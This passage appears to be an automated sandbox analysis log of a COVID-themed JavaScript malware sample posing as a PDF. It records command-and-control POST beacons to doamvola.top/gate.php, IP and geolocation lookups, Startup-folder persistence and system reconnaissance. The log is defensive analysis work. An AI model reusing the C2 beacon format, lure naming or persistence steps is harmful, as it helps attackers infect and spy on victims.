Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json2[1].jsJump to behavior
Source: global traffic, HTTP traffic detected: GET /ip HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io
Source: global traffic, HTTP traffic detected: GET /country HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io
Source: wscript.exe, 00000000.00000002.3161161885.000000000465B000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com{=8 equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wscript.exe, 00000000.00000002.3161161885.000000000465B000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
Source: unknown, HTTP traffic detected: POST /gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) mode: info uuid: 92043542-3A67-1E19-BC53-0184572EE55C version: Scoodle Content-Length: 318 Host: doamvola.top
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Source: Arbeitsschutzregel-Corona-September.pdf.jsInitial sample: Strings found which are bigger than 50
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winJS@10/4@17/6
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\json2.jsJump to behavior
Source: C:\Windows\System32\net.exe, Console Write: System error 6118 has occurred.
Source: C:\Windows\System32\net.exe, Console Write: A remote API error occurred.
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior